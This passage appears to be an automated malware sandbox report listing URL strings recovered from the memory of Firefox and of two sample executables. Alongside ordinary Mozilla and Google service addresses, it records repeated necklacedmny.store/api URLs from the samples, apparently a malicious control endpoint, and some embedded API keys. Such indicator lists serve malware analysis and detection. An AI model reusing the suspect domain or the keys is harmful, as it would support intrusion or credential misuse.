Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E89782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2942879261.0000025E89782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schemaFRAMEBUFFER_INCOMPLETE_ATTACHMENT
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000019.00000002.3028948986.0000025E7E9D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3047335193.0000025E814F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CDC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000019.00000002.3047335193.0000025E814B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000019.00000002.3068152789.0000025E82497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb8
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3020548386.0000025E7D1BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039979682.0000025E80D65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3034070889.0000025E80620000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://pdf.js/PdfJsDefaultPreferences.sys.mjsr
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3018136513.0000025E7CE7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039979682.0000025E80D65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/Ne
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3018136513.0000025E7CE7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039979682.0000025E80D65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C70172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000019.00000002.3020548386.0000025E7D1B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: file.exe, file.exe, 00000000.00000003.2123562004.000000000176D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150740963.0000000001772000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076082716.000000000176E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123681269.0000000001778000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 21024c5511.exe, 00000009.00000003.2797498479.0000000005BCE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2785938732.0000000005BCE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2782680341.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2997206794.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2782618294.0000000001319000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2797279610.0000000005BCB000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2956312480.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2999480700.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2973927647.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2979596133.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2956186047.00000000010D5000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2998836914.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2956999656.00000000010E1000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2954765378.00000000010C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000003.2150740963.0000000001772000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/-A
Source: 21024c5511.exe, 0000000E.00000003.2972147565.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/I
Source: 21024c5511.exe, 0000000E.00000003.2933392825.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/J
Source: 21024c5511.exe, 0000000E.00000003.2972147565.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2972645594.00000000010E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/M
Source: 21024c5511.exe, 0000000E.00000003.2933392825.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/R
Source: 21024c5511.exe, 00000009.00000003.2835176834.0000000001313000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2933392825.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2998836914.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2906476292.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2911472415.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2933392825.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2972147565.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2917844343.00000000010E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: 21024c5511.exe, 0000000E.00000003.2933392825.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api8
Source: file.exe, 00000000.00000003.2144213376.000000000178E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140091412.000000000178F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150740963.000000000178F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168246756.000000000178F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2259665028.0000000001790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api=;
Source: file.exe, 00000000.00000003.2150740963.000000000178F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168246756.000000000178F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api?
Source: file.exe, 00000000.00000003.2140033608.0000000005F33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiB
Source: 21024c5511.exe, 00000009.00000003.2803192433.00000000012FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiEd7sSF
Source: 21024c5511.exe, 0000000E.00000003.2933392825.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2906476292.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2911472415.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2917844343.00000000010E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiI
Source: file.exe, 00000000.00000003.2259665028.0000000001790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apic
Source: 21024c5511.exe, 0000000E.00000003.2999480700.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2973927647.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2979596133.0000000001064000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apie
Source: 21024c5511.exe, 00000009.00000003.2997206794.00000000012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apih
Source: 21024c5511.exe, 0000000E.00000003.2998836914.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2972147565.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apir
Source: 21024c5511.exe, 0000000E.00000003.2933392825.0000000001064000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apis
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/tens
Source: 21024c5511.exe, 0000000E.00000003.2998836914.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/ulM~
Source: 21024c5511.exe, 0000000E.00000003.2933392825.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/z
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039979682.0000025E80D65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sisDefault
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3018136513.0000025E7CE7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039979682.0000025E80D65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sWarning:
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%shandlerSvc
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comhookProfilerRecordingButtonMOZ_BROWSER_TOOLBOX_BINARYdeveloper-button.to
Source: firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000019.00000002.3020548386.0000025E7D1B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000019.00000003.2874578651.0000025E81153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2869331652.0000025E80F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/getUserContextIdForCookieStoreId/shims/adsafeprotected-ima.js
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/getUserContextIdForCookieStoreId/shims/adsafeprotected-ima.js/shims/
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3081282197.0000025E83144000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addonresource:///modules/UrlbarProvidersManager.sy
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000019.00000002.3047335193.0000025E814F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000019.00000002.3069732243.0000025E82535000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2places
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3081282197.0000025E83103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3053736608.0000025E818F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svgwebcompat-reporter
